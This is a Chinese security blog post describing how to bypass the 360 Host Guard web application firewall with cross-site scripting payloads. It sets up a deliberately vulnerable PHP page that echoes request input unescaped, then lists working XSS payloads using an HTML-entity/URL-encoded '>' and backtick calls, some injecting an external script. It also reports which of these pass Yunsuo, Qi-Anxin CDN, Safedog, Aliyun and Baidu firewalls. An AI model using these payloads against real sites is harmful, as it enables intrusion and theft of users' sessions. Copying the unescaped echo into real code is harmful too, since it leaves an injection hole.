围观人数:2614 日期:2020/2/24 15:31:16
360主机卫士是360旗下的服务器安全软件,不过貌似不更新了。
(虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。)
火狐
360主机卫士Apache版
phpStudy2016(PHP-5.4.45+Apache)
测试代码
<?php $input = @$_REQUEST["xss"]; echo "<div>".$input."</div>" ?>
习惯性的直接上 Burp 用平时收集的 payload fuzz 一遍,结果不怎么理想,能过的很鸡肋...然后我就去网上找资料,找到了一篇文章xss加入某些字符即可过大多数waf的思路及一些思考根据里面的思路可以绕过。
<svg onload> 拦截
<svg > onload>不拦截
具体绕过就是先把 > html实体编码
将 > URL编码
大部分 xss payload 加上 %26%2362 即可绕过,但是类似 alert(1) 括号可能会被拦截 可以用反引号替换
<svg %26%2362 onload=alert`1`><svg %26%2362 onload=alert`1`>
给几个测试绕过的 payload
<style %26%2362 onload=alert`1`> <img %26%2362 src=1 onerror=alert`1`> <audio %26%2362 src=x onerror=alert`1`> <svg %26%2362 onload=appendChild(createElement('script')).src='url'>
该文章在最后说明此方法可以绕过多款waf,接下来我们来测试。
云锁:
绕过
<svg %26%2362 onload=alert`1`>
奇安信CDN:
拦截
<svg %26%2362 onload=alert`1`>
绕过方法(使用HTML5新标签)
<select autofocus onfocus=[2].find(alert)>
安全狗:
绕过
阿里云:
拦截
绕过方法(这个百度下就有)
<img src=# onerror=alert`2`> <input onfocus="document.body.appendChild(createElement('script')).src='url'" autofocus>
百度云加速:
绕过
此次利用 > 字符的编码绕过的姿势,再到其他 waf 测试到此结束,至于其他特殊字符是否也有绕过,感兴趣的可以研究下。
关于我们 | 免责声明 | 学员守则 | 广告服务 | 联系我们
©2013-2021 xf1433.com 版权所有
本站资源仅供用于学习和交流,请遵循相关法律法规